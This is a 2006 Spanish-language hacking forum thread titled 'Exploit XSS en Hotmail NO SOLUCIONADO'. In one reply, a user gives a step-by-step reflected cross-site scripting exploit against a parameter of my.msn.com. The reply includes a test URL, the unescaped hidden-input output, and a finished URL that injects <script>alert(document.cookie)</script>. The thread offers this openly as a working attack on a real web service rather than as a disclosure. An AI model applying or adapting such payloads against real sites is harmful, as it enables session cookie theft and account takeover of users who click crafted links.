Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 02:46:07
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Exploit XSS en Hotmail "NO SOLUCIONADO" 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Exploit XSS en Hotmail "NO SOLUCIONADO"  (Leído 760 veces)
gordy
Miembro
*****
Desconectado Desconectado

Mensajes: 55


Ver Perfil
« en: Julio 05, 2006, 08:22:27 »
En línea
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #1 en: Julio 06, 2006, 01:58:34 »
 Explica como se explota, ya que no te creo nada  Wink

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
zickox
Miembro
*****
Desconectado Desconectado

Mensajes: 113


Ver Perfil
« Respuesta #2 en: Julio 06, 2006, 05:05:25 »
Cita de: Pr0gr4mer en Julio 06, 2006, 01:58:34
Explica como se explota

Exploit

The normal URL

    http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1& m=&col=1&tab=3

The test URL

    http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m= hya"'><ho&col=1&tab=3

A ctrl+f in the source for hya gave the invalid input.

    <input type="hidden" name="m" value="hya"'><ho" />

To alert the cookie, it needs to be like this. Fortunately special characters where not escaped.

    <input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />

The exploited URL

    http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m= hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3
En línea
DRIGIN
Miembro
*****
Desconectado Desconectado

Mensajes: 63


pablo_36005@hotmail.com
Ver Perfil WWW Email
« Respuesta #3 en: Julio 07, 2006, 01:53:31 »
Des esto ya puse un post yo hace 2 dias xD pero igual no creo ke le kede muxa vida a este xploit
En línea
www.descargashack.com
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Exploit XSS en Hotmail "NO SOLUCIONADO" « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC